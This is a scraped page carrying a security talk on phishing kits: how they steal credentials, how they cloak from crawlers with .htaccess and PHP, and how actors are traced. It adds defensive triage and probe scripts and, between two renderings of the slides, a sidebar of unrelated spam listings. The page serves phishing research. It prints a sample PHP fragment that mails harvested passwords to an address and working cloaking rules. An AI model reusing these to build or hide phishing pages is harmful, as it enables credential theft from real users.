Copyright©2019 NTT corp. All Rights Reserved.
Catch Phish If You Can
A Case Study of Phishing Website and Actor
2019.05.15
Hirokazu Kodera & Manabu Niseki
Who Are We?
• Manabu Niseki:
  • Researcher, NTT Secure Platform Laboratories
  • NTT-CERT
  • FIRST TC Bali 2018 & Internet Week 2018 speaker
• Hirokazu Kodera:
  • Researcher, NTT Secure Platform Laboratories
THE STATE OF PHISHING
The State of Phishing
Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf/
APWG stats: 785,920 phishing sites in 2018
How can we take countermeasures?
知己知彼
Know yourself,
know your enemy
孫子兵法 / The Art of War
HOW TO CATCH PHISHES
How to Catch Phishes
• Phishing kit:
  • A kit used to deploy a phishing website.
  • Obtaining the phishing kit makes it possible to analyze the phishing website.
How to Catch Phishes
• Phishing actors make OPSEC failures.
  • e.g. paypal-support.big[.]com[.]my
How to Catch Phishes
• Phishing kit collecting methods:
  1. Subscribing to & generating feeds
  2. Enumerating phishy URLs
  3. Crawling the phishy URLs
• An open directory on a phishing website makes it possible to download the phishing kit.
• (Diagram) Sources of phishy URLs:
  • Subscribed feeds: OpenPhish, PhishTank
  • Generated feeds: CT logs, new domains
  • Phishy URLs are crawled to collect phishing kits.
INSIDE PHISHING KITS:
HOW TO STEAL CREDENTIALS
Inside Phishing Kits
• How do phishing kits steal credentials?
• Two major ways:
  • Writing credentials to a local file.
  • Sending credentials to an actor's email address.
Inside Phishing Kits
• (Screenshot) Kit code writing credentials to lolo.txt
Inside Phishing Kits
• (Screenshot) Kit code sending credentials to myloginbox@protonmail.com
Inside Phishing Kits
• Stats of email providers abused by actors (bar chart of address counts, scale 0 to 4,000). Providers shown: mail.ru, aol.com, zoho.com, protonmail.com, mail.com, outlook.com, hotmail.com, yandex.com, yahoo.com, gmail.com.
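A worked example, added here and not part of the talk or of any kit: a small Python triage that scans a kit's PHP files for the two exfiltration methods above (mail() to a recipient address, and writes of stolen credentials to a local drop file) and tallies recipient addresses by provider, the way the chart does across many kits. The SAMPLE_KIT sources, addresses and helper names are constructed for this example.

```python
"""Exfiltration triage for a phishing kit (added example, not the talk's code).

Scans a kit's PHP files for the two exfil methods described in the slides: mail()
calls with a recipient address, and writes of stolen credentials to a local file.
The SAMPLE_KIT sources below are constructed for this example.
"""
import re
from collections import Counter
from typing import Dict, List, Set

# Constructed kit files modelling the two exfil methods (not a real kit).
SAMPLE_KIT: Dict[str, str] = {
    "login.php": (
        "<?php\n"
        "$message = 'Email: ' . $_POST['email'] . ' Pass: ' . $_POST['password'];\n"
        "$recipient = 'myloginbox@protonmail.com';\n"
        "mail($recipient, 'New Login', $message);\n"
        "$f = fopen('lolo.txt', 'a'); fwrite($f, $message . \"\\n\"); fclose($f);\n"
        "?>"
    ),
    "send.php": (
        "<?php\n"
        "$to = 'drop1@gmail.com,drop2@yandex.com';\n"
        "mail($to, 'rezult', $msg, $headers);\n"
        "?>"
    ),
    "index.html": "<html><body>Sign in</body></html>",  # not PHP, skipped
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
# fopen()/file_put_contents() with a literal first argument: the local drop file.
FILE_WRITE_RE = re.compile(r"\b(?:fopen|file_put_contents)\s*\(\s*['\"]([^'\"]+)['\"]")


def find_exfil(files: Dict[str, str]) -> Dict[str, object]:
    """Collect recipient addresses, a per-provider tally, mail() count and drop files."""
    emails: Set[str] = set()
    drop_files: Set[str] = set()
    mail_calls = 0
    for name, src in files.items():
        if not name.lower().endswith(".php"):
            continue
        emails.update(EMAIL_RE.findall(src))
        mail_calls += len(MAIL_CALL_RE.findall(src))
        drop_files.update(FILE_WRITE_RE.findall(src))
    providers = Counter(addr.split("@", 1)[1].lower() for addr in emails)
    methods = (["email"] if mail_calls else []) + (["local_file"] if drop_files else [])
    return {
        "emails": sorted(emails),
        "providers": dict(providers),
        "mail_calls": mail_calls,
        "drop_files": sorted(drop_files),
        "exfil_methods": sorted(methods),
    }


def tally_providers(kits: List[Dict[str, str]]) -> Counter:
    """Aggregate the provider tally across many kits (what the slides' bar chart shows)."""
    total: Counter = Counter()
    for kit in kits:
        total.update(find_exfil(kit)["providers"])
    return total
```

To triage a real kit, read each file of the unpacked archive into a dict of name to source and pass it to find_exfil().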
INSIDE PHISHING KITS:
HOW TO CLOAK
Cloaking Function of Phishing Kits
• Some phishing sites include a cloaking function.
  • Implemented with .htaccess and PHP
• Cloaking targets:
  • IP address
  • User-Agent
  • HTTP Referer
• (Diagram) A normal user can access the phishing site, while a crawler cannot.
Cloaking Function of Phishing Kits
• Implementation examples with .htaccess and PHP

Implementation example with .htaccess (Referer check):

    RewriteEngine on
    RewriteCond %{HTTP_REFERER} example\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} www\.example\.com
    RewriteRule ^.* - [F,L]

A request whose Referer matches example.com or www.example.com is denied (403 Forbidden).

Implementation example with .htaccess (IP address / host deny list):

    RewriteEngine on
    order allow,deny
    deny from 192.0.2.0/24
    deny from 198.51.100.0/24
    deny from example.com
    deny from env=stealthed
    allow from all

Implementation example with PHP (User-Agent check):

    <?php
    // Deny the request when the User-Agent contains "crawler" or "bot".
    // strpos() returns false when the needle is absent, so compare with !== false
    // (a bare truthiness test would miss a match at offset 0).
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    if (strpos($ua, 'crawler') !== false || strpos($ua, 'bot') !== false) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
    ?>

A request whose User-Agent contains "crawler" or "bot" is denied (404 Not Found).
Dynamic Analysis Against Phishing Kits
• How to analyze the cloaking function in a phishing kit:
  1. Deploy the phishing kit on a Web server in a closed environment.
  2. Send HTTP requests with multiple HTTP header conditions (User-Agent and Referer) to the phishing kit.
  3. Observe the HTTP responses from the phishing kit.
• (Diagram, closed environment) The analysis tool sends requests to the deployed kit varying the User-Agent (e.g. testbot, Bot) and the Referer, and records whether the kit answers HTTP/1.1 200 OK or HTTP/1.1 403 Forbidden.
Dynamic Analysis Against Phishing Kits
• About 12.9% of phishing kits have a cloaking function against User-Agent or Referer.
  • Analyzed phishing kits: 4,917
  • With cloaking function: 636 (12.9%)
  • Without cloaking function: 4,281 (87.1%)
• Observed cloaking responses:
  • Respond with "403 Forbidden" or "404 Not Found".
  • Redirect to a legitimate site or a search engine.
• Summary of redirection to legitimate sites (redirect target → phishing target):
  • google.com → Dropbox, Apple
  • yahoo.com → PayPal
  • www.linkedin.com → LinkedIn
  • www.paypal.com → PayPal
  • www.gov.uk → UK Revenue Customs Agency
  • www.asb.co.nz → ASB Bank
Dynamic Analysis Against Phishing Kits
• Whether a phishing kit has a cloaking function can be identified by sending 13 patterns of HTTP request.
  • Analyzed the 636 phishing kits that include a cloaking function.
  • 86.6% of those phishing kits block an HTTP request with the "Surfbot" User-Agent.
  • The result indicates a connection between phishing actors: the cloaking techniques may be shared among them.
• The 13 HTTP header patterns (header: parameter):
  1. User-Agent: Surfbot
  2. Referer: spamcop.net
  3. User-Agent: imo-google-robot-intelink
  4. User-Agent: AdsBot-Google
  5. Referer: http://http://safebrowsing-cache.google.com/
  6. User-Agent: ASPSeek
  7. User-Agent: HSFT - LVU Scanner
  8. Referer: altavista.com
  9. Referer: google.com.ar
  10. User-Agent: CoolBot
  11. User-Agent: DISCo Pump 3.2
  12. User-Agent: NetZip Downloader
  13. User-Agent: tor-exit
Phishing Sites Including Cloaking Function
• How to check whether a live phishing site has a cloaking function:
  1. Access the phishing site with the HTTP header patterns analyzed in the previous step (1. User-Agent: Surfbot, 2. Referer: spamcop.net, ..., 13. User-Agent: tor-exit).
  2. Observe the HTTP response from the phishing site.
• (Diagram) Phishing Site A:
  • GET http://example.jp/phishing.php with User-Agent: Surfbot → HTTP/1.1 403 Forbidden
  • Phishing Site A has a cloaking function.
• (Diagram) Phishing Site B:
  • GET http://example.com/fake.php with User-Agent: Surfbot → HTTP/1.1 200 OK
  • GET http://example.com/fake.php with Referer: spamcop.net → HTTP/1.1 200 OK
  • GET http://example.com/fake.php with User-Agent: tor-exit → HTTP/1.1 200 OK
  • Phishing Site B doesn't have a cloaking function.
Phishing Sites Including Cloaking Function
• 10.4% of live phishing sites have a cloaking function (89.6% do not).
  • The number of accessed phishing site URLs: 4,901
  • On some phishing sites the access control implemented with .htaccess may not be enabled.
• (Diagram) The same phishing kit behaves differently in the two settings:
  • Closed environment: the kit (which has a cloaking function) answers a request with User-Agent: testbot with HTTP/1.1 403 Forbidden.
  • Live phishing site from which the kit was downloaded: the same request gets HTTP/1.1 200 OK.
  • The phishing site doesn't deny access even though the same phishing kit has a cloaking function.
Characteristic Cloaking Function
• Some phishing kits have a cloaking function that makes analysis more difficult:
  • The IP address that connected to the phishing site is added to the .htaccess file dynamically.
  • On accessing the same phishing site again, the second access is redirected to a legitimate site (screenshot: the second connection is redirected to PayPal).
• We need to take the cloaking function into account when researching phishing sites.
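An added example (not the talk's tooling) that implements the check described in the dynamic-analysis and live-site slides above, including the repeated-visit case from this slide: it replays the 13 header patterns against one URL, compares each response with a baseline request, then repeats the baseline to catch the per-IP .htaccess cloaking. The simulate_kit responder, the baseline User-Agent and all helper names are assumptions of this example.

```python
"""Cloaking probe for phishing-site analysis (added example, not the talk's code).

Replays the 13 header patterns from the slides against one URL, compares each
response with a baseline browser-like request, then repeats the baseline to
catch kits that add the visitor's IP to .htaccess after the first hit.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# The 13 header patterns from the slides: (header name, value).
PATTERNS: List[Tuple[str, str]] = [
    ("User-Agent", "Surfbot"),
    ("Referer", "spamcop.net"),
    ("User-Agent", "imo-google-robot-intelink"),
    ("User-Agent", "AdsBot-Google"),
    ("Referer", "http://http://safebrowsing-cache.google.com/"),
    ("User-Agent", "ASPSeek"),
    ("User-Agent", "HSFT - LVU Scanner"),
    ("Referer", "altavista.com"),
    ("Referer", "google.com.ar"),
    ("User-Agent", "CoolBot"),
    ("User-Agent", "DISCo Pump 3.2"),
    ("User-Agent", "NetZip Downloader"),
    ("User-Agent", "tor-exit"),
]

# Baseline request: an ordinary browser-like User-Agent (constructed value).
BASELINE_HEADERS: Dict[str, str] = {"User-Agent": "Mozilla/5.0 (analysis baseline)"}

Fetcher = Callable[[Dict[str, str]], int]  # request headers -> HTTP status code


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Never follow redirects: a 3xx to a legitimate site is itself a cloaking signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetcher(url: str, timeout: float = 10.0) -> Fetcher:
    """Build a fetcher that sends the given headers to `url` and returns the status."""
    opener = urllib.request.build_opener(_NoRedirect)

    def fetch(headers: Dict[str, str]) -> int:
        req = urllib.request.Request(url, headers=headers)
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here
            return err.code

    return fetch


def is_blocked(status: int, baseline: int) -> bool:
    """Cloaked = error or redirect, or any deviation from the baseline status."""
    return status >= 300 or status != baseline


def probe(fetch: Fetcher) -> Dict[str, object]:
    """Baseline, then the 13 patterns, then the baseline again; summarise."""
    baseline = fetch(BASELINE_HEADERS)
    blocked: List[str] = []
    for name, value in PATTERNS:
        headers = dict(BASELINE_HEADERS)
        headers[name] = value  # Referer patterns keep the baseline User-Agent
        status = fetch(headers)
        if is_blocked(status, baseline):
            blocked.append(f"{name}: {value} -> {status}")
    # A kit that records the first visitor's IP in .htaccess answers the second
    # plain request differently (typically a redirect to the targeted brand).
    second = fetch(BASELINE_HEADERS)
    return {
        "baseline_status": baseline,
        "blocked": blocked,
        "has_cloaking": bool(blocked),
        "dynamic_ip_cloaking": is_blocked(second, baseline),
    }


def simulate_kit(dynamic_ip: bool = False) -> Fetcher:
    """Constructed responder mirroring the slides' cloaking code: a User-Agent containing
    'crawler' or 'bot' (case-sensitive, like strpos) gets 404, a Referer on example.com
    gets 403. With dynamic_ip=True every request after the first is redirected."""
    hits = {"n": 0}

    def fetch(headers: Dict[str, str]) -> int:
        hits["n"] += 1
        ua = headers.get("User-Agent", "")
        if "crawler" in ua or "bot" in ua:
            return 404
        if "example.com" in headers.get("Referer", ""):
            return 403
        if dynamic_ip and hits["n"] > 1:
            return 302  # redirect to the legitimate site
        return 200

    return fetch
```

For a live site call probe(http_fetcher(url)); because redirects are not followed, a 3xx answer is reported as a cloaking response rather than silently resolved.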
WHO DID IT?
Signature / Credits Analysis (screenshots)
• Th3 Exploiter
• Ak47-VbV
• Shadow Z118
Signature / Credits Analysis
• Signature / credits analysis makes it possible to trace phishing actors.
• OSINT techniques:
  • Username check:
    • Check User Names, Knowem, Pipl
  • Domain and IP research:
    • RiskIQ, SecurityTrails, VirusTotal
  • Googling
Chasing Indonesian Actors
• Indonesian phishing actors:
  • RSJKINGDOM (a.k.a. DarkLight)
  • DevilScream (a.k.a. Z1coder)
  • Spammer ID
• Others:
  • Hijaiyh (a.k.a. justalinko), IDHAAM69, Indonesian Darknet and more.
CHASING INDONESIAN ACTORS:
RSJKINGDOM
RSJKINGDOM
• RSJKINGDOM:
  • A developer of phishing kits targeting PayPal & Apple
• (Screenshots; names shown: RSJKINGDOM, DarkLight)
CHASING INDONESIAN ACTORS:
DEVILSCREAM
DevilScream
• DevilScream:
  • A developer of the infamous phishing kit "16shop".
• (Screenshots; names shown: Riswanda, devilscream, Z1coder)
• Total: 768 domains (2019/03)
• GitHub as a C2 (since 16shop v2)
• Attribution by Phishing AI:
  • Source: https://twitter.com/PhishingAi/status/1011688773610979328/
CHASING INDONESIAN ACTORS:
SPAMMER ID
Spammer ID
• (Screenshot) RSJKINGDOM's profile picture on Kongknow
• Spammer ID runs various services:
  • arakatestore[.]com
    • HTML to PDF converter
    • Encrypt text with HTML hidden characters
  • carder[.]io
    • BIN checker
  • spmr[.]us
    • URL shortener
  • spammer[.]me
    • OCR reader, Priv8 tools, etc.
COUNTERMEASURES WE’VE TAKEN
Countermeasures We've Taken
• Reporting phishing websites:
  • To Google Safe Browsing
  • To hosting providers
• Sharing a report with LEAs & CSIRT/CERTs.
CONCLUSIONS
Conclusions
• You can obtain phishing kits by leveraging OSINT.
• The cloaking function in phishing kits makes them difficult to analyze.
  • But you can bypass it by knowing how it works.
• You can take practical countermeasures against phishing attacks by analyzing phishing kits.
ANY QUESTIONS?
References
• DeepEnd Research: Indonesian Spam Communities
  • http://www.deependresearch.org/2018/09/indonesian-spam-communities.html
• NetSecOps: Analysis of Phishing mail. Drone bought from Apple
  • http://netsecops.info/bought-a-drone-from-apple-really/

Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
 
20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdf20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdf
 
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default  Presentation : Data Analysis Project PPTPredictive Analysis for Loan Default  Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPT
 
Learn How Data Science Changes Our World
Learn How Data Science Changes Our WorldLearn How Data Science Changes Our World
Learn How Data Science Changes Our World
 
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
 
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
 
Identifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population MeanIdentifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population Mean
 
RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.
 
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
 
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
 
RadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdfRadioAdProWritingCinderellabyButleri.pdf
RadioAdProWritingCinderellabyButleri.pdf
 
Predicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdfPredicting Salary Using Data Science: A Comprehensive Analysis.pdf
Predicting Salary Using Data Science: A Comprehensive Analysis.pdf
 
Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...Student Profile Sample report on improving academic performance by uniting gr...
Student Profile Sample report on improving academic performance by uniting gr...
 
modul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptxmodul pembelajaran robotic Workshop _ by Slidesgo.pptx
modul pembelajaran robotic Workshop _ by Slidesgo.pptx
 

Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

  • 1. Copyright©2019 NTT corp. All Rights Reserved. Catch Phish If You Can: A Case Study of Phishing Website and Actor. 2019.05.15. Hirokazu Kodera & Manabu Niseki
  • 2. Who Are We?
    • Manabu Niseki:
      • Researcher, NTT Secure Platform Laboratories
      • NTT-CERT
      • FIRST TC Bali 2018 & Internet Week 2018 speaker
    • Hirokazu Kodera:
      • Researcher, NTT Secure Platform Laboratories
  • 3. THE STATE OF PHISHING
  • 4. The State of Phishing
    • APWG stats: 785,920 phishing sites in 2018
    • Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf/
  • 5. How can we take countermeasures?
  • 6. 知己知彼 / Know yourself, know your enemy (孫子兵法 / The Art of War)
  • 7. HOW TO CATCH PHISHES
  • 8. How to Catch Phishes
    • Phishing kit:
      • A kit to deploy a phishing website.
      • It is possible to analyze a phishing website by obtaining its phishing kit.
  • 9. How to Catch Phishes
    • Phishing actors make OPSEC failures.
      • e.g. paypal-support.big[.]com[.]my
  • 10. How to Catch Phishes
    • Phishing kit collecting methods:
      1. Subscribing to & generating feeds
      2. Enumerating phishy URLs
      3. Crawling the phishy URLs
    • An open directory website makes it possible to download a phishing kit.
    • Diagram: Subscribe feeds (OpenPhish, PhishTank) and Generate feeds (CT logs, New domains) -> Phishy URLs -> Phishing Kits
  • 11. INSIDE PHISHING KITS: HOW TO STEAL CREDENTIALS
  • 12. Inside Phishing Kits
    • How do phishing kits steal credentials?
    • Two major ways:
      • Writing credentials to a local file.
      • Sending credentials to an actor's email address.
  • 13. Inside Phishing Kits: Writing credentials to lolo.txt
  • 14. Inside Phishing Kits: Sending credentials to myloginbox@protonmail.com
  • 15. Inside Phishing Kits: Stats of email providers abused by actors
    • Bar chart (axis: count) of mail providers seen in the kits: mail.ru, aol.com, zoho.com, protonmail.com, mail.com, outlook.com, hotmail.com, yandex.com, yahoo.com, gmail.com
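Slides 12 to 15 describe the two exfiltration paths and the mailbox-provider tally. The script below is an added example (not the authors' tool) that triages a kit's PHP source for both: it resolves the first argument of mail() to a literal address and records files opened for writing or appending, then tallies providers across kits. SAMPLE_KIT is a constructed fragment using the values shown on slides 13 and 14; the regexes are a heuristic, so obfuscated kits still need manual review.

```python
"""Static triage of a phishing kit's exfiltration paths (slides 12 to 15).
Added example, not the authors' tool.  SAMPLE_KIT is a constructed PHP
fragment built from the values shown on slides 13 and 14."""
import re
from collections import Counter

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Files opened for writing/appending with fopen(), or written with file_put_contents().
WRITE_RE = re.compile(r"""fopen\(\s*["']([^"']+)["']\s*,\s*["'][aw]\+?["']"""
                      r"""|file_put_contents\(\s*["']([^"']+)["']""")
# mail() calls: capture the first argument (a string literal or a variable name).
MAIL_RE = re.compile(r"""\bmail\(\s*(\$\w+|["'][^"']+["'])""")
# Simple "$var = 'literal';" assignments, used to resolve variable recipients.
ASSIGN_RE = re.compile(r"""(\$\w+)\s*=\s*["']([^"']+)["']""")

SAMPLE_KIT = {  # constructed: path -> PHP source
    "login.php": r"""<?php
$send = "myloginbox@protonmail.com";
$message = "Email: ".$_POST['email']."\nPass: ".$_POST['pass'];
mail($send, "New Login", $message);
$fp = fopen("lolo.txt", "a");
fwrite($fp, $message);
fclose($fp);
header("Location: https://www.paypal.com/");
?>""",
}

def exfil_targets(kit):
    """Return {'emails': [...], 'files': [...]} found across all kit files."""
    emails, files = set(), set()
    for src in kit.values():
        assigns = dict(ASSIGN_RE.findall(src))
        for arg in MAIL_RE.findall(src):
            # A variable argument is looked up; a literal is used as-is.
            target = assigns.get(arg, arg).strip("\"'")
            if EMAIL_RE.fullmatch(target):
                emails.add(target)
        for m in WRITE_RE.finditer(src):
            files.add(m.group(1) or m.group(2))
    return {"emails": sorted(emails), "files": sorted(files)}

def provider_counts(kits):
    """Tally the mailbox providers across many kits, as in the slide 15 chart."""
    counts = Counter()
    for kit in kits:
        for addr in exfil_targets(kit)["emails"]:
            counts[addr.rsplit("@", 1)[1].lower()] += 1
    return counts
```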
  • 16. INSIDE PHISHING KITS: HOW TO CLOAK
  • 17. Cloaking Function of Phishing Kits
    • Some phishing sites include a cloaking function.
      • Implemented with .htaccess and PHP
    • Cloaking targets:
      • IP address
      • User-Agent
      • HTTP Referer
    • Diagram: a normal user can access the phishing site, while a crawler cannot.
  • 18. Cloaking Function of Phishing Kits
    • Implementation example with .htaccess and PHP
    • Implementation example with .htaccess (an access with Referer example.com or www.example.com is denied):
        RewriteEngine on
        RewriteCond %{HTTP_REFERER} example\.com [NC,OR]
        RewriteCond %{HTTP_REFERER} www\.example\.com
        RewriteRule ^.* - [F,L]

        RewriteEngine on
        order allow,deny
        deny from 192.0.2.0/24
        deny from 198.51.100.0/24
        deny from example.com
        deny from env=stealthed
        allow from all
    • Implementation example with PHP (an access with a User-Agent containing "crawler" or "bot" is denied with a fake 404):
        <?php
        // strpos() returns false when the substring is absent, so compare with !== false.
        if (strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') !== false
            or strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
        ?>
  • 19. Dynamic Analysis Against Phishing Kits
    • How to analyze a cloaking function in a phishing kit?
      1. Deploy the phishing kit on a Web server in a closed environment.
      2. Send HTTP requests with multiple HTTP header conditions (User-Agent and Referer) to the phishing kit.
      3. Observe the HTTP responses from the phishing kit.
    • Diagram: in the closed environment, the analysis tool sends requests such as User-Agent: testbot and User-Agent: Bot to the phishing kit deployed on the Web server and observes responses such as HTTP/1.1 200 OK and HTTP/1.1 403 Forbidden.
  • 20. Dynamic Analysis Against Phishing Kits
    • About 12.9% of phishing kits have a cloaking function against User-Agent or Referer.
      • Analyzed phishing kits: 4,917
      • Include a cloaking function: 636 (12.9%)
      • Do not include a cloaking function: 4,281 (87.1%)
    • Observed cloaking behaviour:
      • Respond "403 Forbidden" or "404 Not Found".
      • Redirect to a legitimate site or a search engine.
    • Summary of redirection to search engines and legitimate sites (redirect target -> phishing target):
      • google.com -> Dropbox, Apple
      • yahoo.com -> PayPal
      • www.linkedin.com -> LinkedIn
      • www.paypal.com -> PayPal
      • www.gov.uk -> UK Revenue Customs Agency
      • www.asb.co.nz -> ASB Bank
  • 21. Dynamic Analysis Against Phishing Kits
    • It is possible to identify whether a phishing kit has a cloaking function by sending 13 patterns of HTTP request.
    • Analyzed the 636 phishing kits which include a cloaking function.
      • 86.6% of them block an HTTP request with the "Surfbot" User-Agent.
    • The result indicates a connection between phishing actors: the cloaking techniques may be shared among them.
    • HTTP header patterns (header: parameter):
      1. User-Agent: Surfbot
      2. Referer: spamcop.net
      3. User-Agent: imo-google-robot-intelink
      4. User-Agent: AdsBot-Google
      5. Referer: http://http://safebrowsing-cache.google.com/
      6. User-Agent: ASPSeek
      7. User-Agent: HSFT - LVU Scanner
      8. Referer: altavista.com
      9. Referer: google.com.ar
      10. User-Agent: CoolBot
      11. User-Agent: DISCo Pump 3.2
      12. User-Agent: NetZip Downloader
      13. User-Agent: tor-exit
  • 22. Phishing Sites Including Cloaking Function
    • How to check whether a phishing site has a cloaking function?
      1. Access the phishing site with the HTTP header patterns analyzed in the previous step.
      2. Observe the HTTP response from the phishing site.
    • Diagram: the analysis tool sends the 13 HTTP header patterns (1. User-Agent: Surfbot, 2. Referer: spamcop.net, ..., 13. User-Agent: tor-exit).
      • Phishing Site A: GET http://example.jp/phishing.php with User-Agent: Surfbot -> HTTP/1.1 403 Forbidden. Phishing Site A has a cloaking function.
      • Phishing Site B: GET http://example.com/fake.php with User-Agent: Surfbot -> HTTP/1.1 200 OK; with Referer: spamcop.net -> HTTP/1.1 200 OK; with User-Agent: tor-exit -> HTTP/1.1 200 OK. Phishing Site B doesn't have a cloaking function.
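The dynamic check of slides 19, 21 and 22, as an added example that is not the authors' tool: it sends the 13 header patterns of slide 21 to a kit deployed in your own closed environment and classifies each response with the slide 20 rule (403/404, or a redirect to another host, counts as cloaking). The `fetch` parameter lets a canned responder stand in for real HTTP, which is how the Site A / Site B cases of slide 22 can be reproduced offline.

```python
"""Dynamic cloaking check for a phishing kit deployed in a closed lab
(slides 19, 21, 22).  Added example, not the authors' tool: the 13 header
patterns are those of slide 21, the verdict rule follows slide 20."""
import urllib.error
import urllib.request
from urllib.parse import urlparse

# The 13 (header, value) patterns listed on slide 21.
PATTERNS = [
    ("User-Agent", "Surfbot"),
    ("Referer", "spamcop.net"),
    ("User-Agent", "imo-google-robot-intelink"),
    ("User-Agent", "AdsBot-Google"),
    ("Referer", "http://http://safebrowsing-cache.google.com/"),
    ("User-Agent", "ASPSeek"),
    ("User-Agent", "HSFT - LVU Scanner"),
    ("Referer", "altavista.com"),
    ("Referer", "google.com.ar"),
    ("User-Agent", "CoolBot"),
    ("User-Agent", "DISCo Pump 3.2"),
    ("User-Agent", "NetZip Downloader"),
    ("User-Agent", "tor-exit"),
]

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the Location the kit sends us to is the evidence."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def http_fetch(url, header, value):
    """One GET carrying a single probe header; returns (status, Location)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={header: value})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # unfollowed 3xx and 4xx land here
        return err.code, err.headers.get("Location")

def classify(status, location, kit_host):
    """'blocked', 'redirect' (off the kit's host) or 'served', per slide 20."""
    if status in (403, 404):
        return "blocked"
    if 300 <= status < 400 and location:
        if urlparse(location).hostname not in (None, kit_host):
            return "redirect"
    return "served"

def probe(url, fetch=http_fetch):
    """Send every pattern to the lab-deployed kit; returns pattern -> verdict."""
    kit_host = urlparse(url).hostname
    return {f"{header}: {value}": classify(*fetch(url, header, value), kit_host)
            for header, value in PATTERNS}

def has_cloaking(results):
    """True when at least one pattern was blocked or redirected away."""
    return any(verdict != "served" for verdict in results.values())
```

A redirect to a path on the kit's own host (for example its index page) is counted as served, since that is ordinary site behaviour rather than cloaking.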
  • 23. Phishing Sites Including Cloaking Function
    • 10.4% of phishing sites have a cloaking function (89.6% do not).
      • The number of accessed phishing site URLs: 4,901
    • Some phishing sites may not have the access control implemented with .htaccess enabled.
    • Diagram: the same phishing kit answers User-Agent: testbot with HTTP/1.1 403 Forbidden when deployed in the closed environment, but the live phishing site the kit was downloaded from answers HTTP/1.1 200 OK. The phishing site doesn't deny access though the same phishing kit has a cloaking function.
  • 24. Characteristic Cloaking Function
    • Some phishing kits have a cloaking function which makes analysis more difficult:
      • The IP address which connected to the phishing site is added to the .htaccess file dynamically.
      • When the same phishing site is accessed again, the second access is redirected to a legitimate site (the example redirects the second connection to PayPal).
    • We need to take care of the cloaking function when researching phishing sites.
  • 25. WHO DID IT?
  • 26. Signature / Credits Analysis: Th3 Exploiter
  • 27. Signature / Credits Analysis: Ak47-VbV
  • 28. Signature / Credits Analysis: Shadow Z118
  • 29. Signature / Credits Analysis
    • Signature / credits analysis makes it possible to trace out phishing actors.
    • OSINT techniques:
      • Username check: Check User Names, Knowem, Pipl
      • Domain and IP research: RiskIQ, SecurityTrails, VirusTotal
      • Googling
  • 30. Chasing Indonesian Actors
    • Indonesian phishing actors:
      • RSJKINGDOM (a.k.a. DarkLight)
      • DevilScream (a.k.a. Z1coder)
      • Spammer ID
      • Others: Hijaiyh (a.k.a. justalinko), IDHAAM69, Indonesian Darknet and more.
  • 31. CHASING INDONESIAN ACTORS: RSJKINGDOM
  • 32. RSJKINGDOM
    • A developer of phishing kits targeting PayPal & Apple
  • 33. RSJKINGDOM (RSJKINGDOM / DarkLight)
  • 34. RSJKINGDOM
  • 35. RSJKINGDOM
  • 36. RSJKINGDOM
  • 37. CHASING INDONESIAN ACTORS: DEVILSCREAM
  • 38. DevilScream
